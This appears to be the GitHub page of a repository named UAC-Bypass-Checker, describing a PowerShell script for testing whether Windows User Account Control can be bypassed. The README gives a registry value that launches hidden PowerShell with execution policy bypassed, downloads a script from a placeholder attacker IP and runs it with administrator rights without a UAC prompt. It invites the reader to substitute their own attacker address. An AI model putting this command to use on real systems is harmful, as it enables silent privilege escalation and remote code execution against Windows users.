Skip to content

This is a Powershell script made to check if you can bypass UAC. Change the CHANGETHIS username to your actual username LINE 17 & LINE 21

Notifications You must be signed in to change notification settings

sergiovks/UAC-Bypass-Checker

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 

Repository files navigation

UAC-Bypass-Checker

This is a Powershell script made to check if you can bypass UAC.

----------IMPORTANT----------

Change the CHANGETHIS username to your actual username LINE 17 & LINE 21

You can use the following command to download and execute a powershell script as an administrator bypassinc UAC (change the attacker IP & script.ps1 for what you need).

$RegValue = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep Bypass -windowstyle hidden -nop iex (New-Object Net.WebClient).DownloadString('http://IPattacker/script.ps1'); Invoke-Function"

About

This is a Powershell script made to check if you can bypass UAC. Change the CHANGETHIS username to your actual username LINE 17 & LINE 21

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published